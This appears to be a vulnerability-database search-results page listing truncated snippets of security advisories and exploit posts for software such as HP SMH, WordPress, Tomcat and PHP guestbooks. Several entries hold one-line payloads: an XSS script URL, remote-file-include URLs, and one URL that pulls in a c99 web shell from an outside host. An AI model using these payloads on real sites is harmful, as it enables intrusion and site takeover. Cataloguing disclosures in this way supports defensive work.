47153 matches found
[security bulletin] HPSBMA02426 SSRT090053 rev.1 - HP System Management Homepage (SMH) for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting (XSS), Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01743291 Version: 1 HPSBMA02426 SSRT090053 rev.1 - HP System Management Homepage SMH for Linux and Windows Running PHP and OpenSSL, Remote Cross Site Scripting XSS, Unauthorized Access NOTICE: Th...
dnsmasq multiple security vulnerabilities
DNS records spoofing, DoS...
CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit
/ / | | | | ----====/ // / | || |====---- | | | || | | | | | | | | | | | | | ------====== / /| || || || |======------ / || || / Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2008-0002...
XSS in lighttpd
hey guys .. check out this new xss i just found ;P Vulnerable : lighttpd web : http://www.lighttpd.net XSS : http://127.0.0.1/path/search?q=223E3Cscript3Ealert2827bl4ck27293C2Fscript3E Discovered By BLacK ZeRo [email protected] Best regards ,,...
Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
Signkorn Guestbook = v1.3 Multiple Remote File Include Vulnerabilities Discovred By : ThELeO ; Software : Signkorn Guestbook v 1.3 ; Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2" Exploit : http://Www.Example.Com/Script/index.php?dirpath=U r Evil Script ;...
Comersus Cart Improper Request Handling
Comersus Cart Improper Request Handling Release Date: July 6, 2004 Severity: Medium Vendor: Comersus Open Technologies Software: Tested on Comersus Cart 5.09 Previous versions may also be affected. Remote: Remotely executed from any web browser Technical Details: The unethical user is able to...
MiniUPnP library buffer overflow
Buffer overflow on network request processing...
CSRF & XSS Wing FTP Server Admin <= v4.4.5
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 Source: ==================================== http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt Common Vulnerability Scoring System: ==================================== Overal...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Certificate check bypass, code execution, restrictions bypass, memory corruptions...
[ MDVSA-2014:004 ] nagios
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:004 http://www.mandriva.com/en/support/security/ Package : nagios Date : January 16, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 Problem Description: Multiple vulnerabilities has been discovere...
Omnistar Document Manager v8.0 - Multiple Vulnerabilities
Title: ====== Omnistar Document Manager v8.0 - Multiple Vulnerabilities Date: ===== 2012-10-03 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=712 VL-ID: ===== 712 Common Vulnerability Scoring System: ==================================== 8.3 Introduction: =============...
CVE-2012-4415: guacamole local root vulnerability
Overview ======== "Guacamole is an HTML5 web application that provides access to desktop environments using remote desktop protocols such as VNC or RDP. A centralized server acts as a tunnel and proxy, allowing access to multiple desktops through a web browser. No plugins are needed: the client...
Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerabilities Zones Web Solution status.asp?print searchresult.php?locid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.zones.in/ Persian Gulf 4 Ever! Dork : "Powered by Zones Web...
SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress
SEC Consult Vulnerability Lab Security Advisory 20110701-0 ======================================================================= title: Multiple SQL Injection Vulnerabilities product: WordPress vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions fixed version: 3.1.4/3.2-RC3 impact:...
www.eVuln.com : SQL Injection in WikLink
www.eVuln.com advisory: SQL Injection in WikLink Summary: http://evuln.com/vulns/170/summary.html Details: http://evuln.com/vulns/170/description.html -----------Summary----------- eVuln ID: EV0170 Software: WikLink Vendor: n/a Version: 0.1.3 Critical Level: medium Type: SQL Injection Status:...
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability SecPod Technologies www.secpod.com Author Sooraj K.S SecPod ID: 1003 07/28/2010 Issue Discovered 07/30/2010 Vendor Notified No Response from Vendor Class: Cross-Site Scripting Severity: Medium Overview: --------- ZeusCar...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Mozilla Foundation Security Advisory 2009-23
Mozilla Foundation Security Advisory 2009-23 Title: Crash in nsTextFrame::ClearTextRun Impact: Critical Announced: April 27, 2009 Reporter: Marc Gueury, Daniel Veditz Products: Firefox Fixed in: Firefox 3.0.10 Description One of the security fixes in Firefox 3.0.9 introduced a regression that...
Elite Forum Full HTML ENject versin 1.0.0.0
c0ded: St@rExT From : Turkey exploit: titleElite Forum FULL HTML ENjocter-By St@rEXT/title style bodybackground:urlhttp://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg; color:FFFFFF; font-weight:bold; input background-color:darkred; color:FFFFFF; font-weight:bold; /style form...
CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability
ConTact Me:-wWw.Asb-May.Net ScRiPt:-http://callofduty.filefront.com/file/DreamStatsSystem;54520 Discovered By:- ThE dE@Th AsB-MaY DiScOvEr ExPlIoTs TeAm index.php:- if !$slots include$rootpath . 'html/serveroffline.php';exit; ExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=Shell milw0rm.com...
[SA16192] phpBook "admin" Cross-Site Scripting Vulnerability
---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...
[SYSS-2015-027] Cross-Site Scripting (CWE-79) in Page2Flip Premium App 2.5
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-027 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Cross-Site Scripting...
C4B XPhone UC Web 4.1.890S R1 - Cross Site Vulnerability
Title: ====== C4B XPhone UC Web 4.1.890S R1 - Cross Site Vulnerability Date: ===== 2012-04-24 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=484 VL-ID: ===== 484 Introduction: ============= XPhone Unified Communications 2011 ist die leistungsstarkste Telefonie- und...
ME Firewall Analyzer v7.2 - Cross Site Vulnerabilities
Title: ====== ME Firewall Analyzer v7.2 - Cross Site Vulnerabilities Date: ===== 2012-04-01 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=437 VL-ID: ===== 437 Introduction: ============= ManageEngine® Firewall Analyzer is a web based tool for change management,...
ZDI-11-190: Oracle Java ICC Profile 'crdi' Tag Parsing Remote Code Execution Vulnerability
ZDI-11-190: Oracle Java ICC Profile 'crdi' Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-190 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java Runtime --...
HTB22946: Multiple SQL Injection in Ajax Category Dropdown wordpress plugin
Vulnerability ID: HTB22946 Reference: http://www.htbridge.ch/advisory/multiplesqlinjectioninajaxcategorydropdownwordpressplugin.html Product: Ajax Category Dropdown wordpress plugin Vendor: http://www.dyasonhat.com/ http://www.dyasonhat.com/ Vulnerable Version: 0.1.5 Vendor Notification: 07 April...
[ MDVSA-2010:107 ] mysql
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2010:107 http://www.mandriva.com/security/ Package : mysql Date : May 25, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0 Problem Description: Multiple vulnerabilities has been...
Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Who: Belkin International, Inc. http://www.belkin.com What: Belkin BullDog Plus UPS Management Software v4.0.2 Build 1219 UPS-Service.exe v1.0.0.1 dated 12/19/2006 How: The UPS management software contains a built-in web server which allows for remote...
ZeroShell <= 1.0beta11 Remote Code Execution
======================================================================== ZeroShell = 1.0beta11 Remote Code Execution ======================================================================== Affected Software: ZeroShell = 1.0beta11 Severity: High Local/Remote: Remote Author: Luca Carettoni -...
Эксплоит для эксплуатации уязвимости EZSA-2008-003
Эксплоит для эксплуатации уязвимости EZSA-2008-003. Описание: Уязвимость связана с недостаточной проверкой при регистрации нового пользователя /user/register. Успешная эксплуатация уязвимости позволяет получить привилегии администратора CMS. Уязвимости подвержены приложения ez publish начиная с...
mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability
mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability Class: Remote Vendor: http://www.mx-system.com/modules/mxpafiledb/dload.php?action=download&fileid=364 Founder: bd0rk Contact: bd0rkathackermail.com Vulnerable Code in /admin/adminalbumotf.php...
US-CERT Technical Cyber Security Alert TA04-111A -- Vulnerabilities in TCP
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Technical Cyber Security Alert TA04-111A archive Vulnerabilities in TCP Original release date: April 20, 2004 Last revised: -- Source: US-CERT Systems Affected Systems that rely on persistent TCP connections, for example routers supporting BGP Overvie...
Subscribe Me Vulnerability
Product: Subscribe Me Versions: ALL version numbers LITE only OS: Unix and Winnt Vendor: Notified, http://www.cgiscriptcenter.com/ The Problem: Yet again the script allows a remote user to overwrite the Admin Passwd file with any password they see fit. Therefore giving them Admin access to the...
Black Watch Labs Vulnerability Alert
Dear Security Professional, The following vulnerability: "Environment and Setup Variables Can Be Viewed Through DBMan db.cgi Script" is in the text of the message below and has just been posted to the Black Watch Labs Web site at http://www.perfectotech.com/blackwatchlabs/ Thank you, Black Watch...
Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities
Over 150 vulnerabilities in different applications are closed in auqrterly update...
SEC Consult SA-20141218-2 :: Multiple high risk vulnerabilities in NetIQ Access Manager
SEC Consult Vulnerability Lab Security Advisory 20141218-2 ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP1 Hot Fix 3 CVE number: CVE-2014-5214,...
[SECURITY] [DSA 3075-1] drupal7 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3075-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso November 20, 2014 http://www.debian.org/security/faq -...
FreeBSD Security Advisory FreeBSD-SA-14:06.openssl [REVISED]
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:06.openssl Security Advisory The FreeBSD Project Topic: OpenSSL multiple vulnerabilities Category: contrib Module: openssl Announced: 2014-04-08 Affects: All...
[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04239372 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239372 Version: 1 HPSBMU02998 rev....
zFtp Server <= 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability
zFtp Server = 2011-04-13 | "STAT,CWD" Remote Denial of Service Vulnerability 1. OVERVIEW The zFTP server is found to be vulnerable to denial of service in handling multiple STAT and CWD command requests. 2. BACKGROUND The zFTP server is a Windows based FTP server with focus on clever Active...
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-09-08 December 9, 2009 -- CVE ID: CVE-2009-3846 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Network Node Manager --...
ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability
ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-085 November 20, 2009 -- CVE ID: CVE-2009-3843 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Operations...
[CVE-2008-1232] Apache Tomcat XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-1232: Apache Tomcat XSS vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.37 Tomcat 5.5.0 to 5.5.26 Tomcat 6.0.0 to 6.0.16 The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be als...
ALL VERSİON PHPAUTOVİDEO c99 shell
ALL VERSON PHPAUTOVDEO AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "powered by phpAutoVideo" DORKS 2 : Copyright © 2007 Agares Media DORKS 3 : allinurl: "playvideo.php?video" EXPLOIT : wwww.xxxxxx.com/admin/frontpageright.php?loadadminpage=http:xxxxx.c99.txt? S@BUN...
[Full-disclosure] Utopia News Pro version 1.4.0 XSS Attack Vulnerability
netVigilance Security Advisory 34 Utopia News Pro version 1.4.0 XSS Attack Vulnerability Description: Utopia News Pro is a powerful and scalable news management system for any web site. News Pro, written in PHP and backed by the renowned MySQL database system, Utopia Software's News Pro is an ide...
PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities
.-""""""""-. / Dj7xpl | | |, .-. .-. ,| | o/ o | |/ / | @ ^^ |IIIIII|/ @8@8|-IIIIII/-| / / @ +Iranian Are The Best In World+ Portal.......: PcP-Book 3.0 Site.........: http://www.pcp-system.at Down.........: http://www.ectona.org/download/?id=621&...
Yahoo! Messenger Auth Bypass Vulnerability
This advisory is being provided to you under the policy documented at http://www.wiretrip.net/rfp/policy.html. You are encouraged to read this policy; however, in the interim, you have approximately 5 days to respond to this initial email. This policy encourages open communication, and I look...
Insecure input balidation in YaBB Search.pl
Hi Everybody, Kosak reported this problem to vuln-dev last night. I downloaded the script and did some testing. There is an input validation problem with the 'catsearch' field, which gets interpolated in an open statement: openFILE, "$boardsdir/$cattosearch" || &fatalerror"$txt'23'...
Security Advisory: Hassan Consulting's shop.cgi Directory Traversal Vulnerability.
October 7, 2000 Security Advisory shop.cgi.ad-1.00-10 : Hassan Consulting's Shopping Cart shop.cgi Directory Traversal Vulnerability Affected Product: Hassan Consulting's Shopping Cart shop.cgi/shop.pl Version 1.18 possibly others aswell Affected Platforms: Unix Windows Overview: Hassan...
SYSS-2015-033: Missing Function Level Access Control (CWE-935) in Page2Flip Premium App 2.5
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-033 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Missing Function Leve...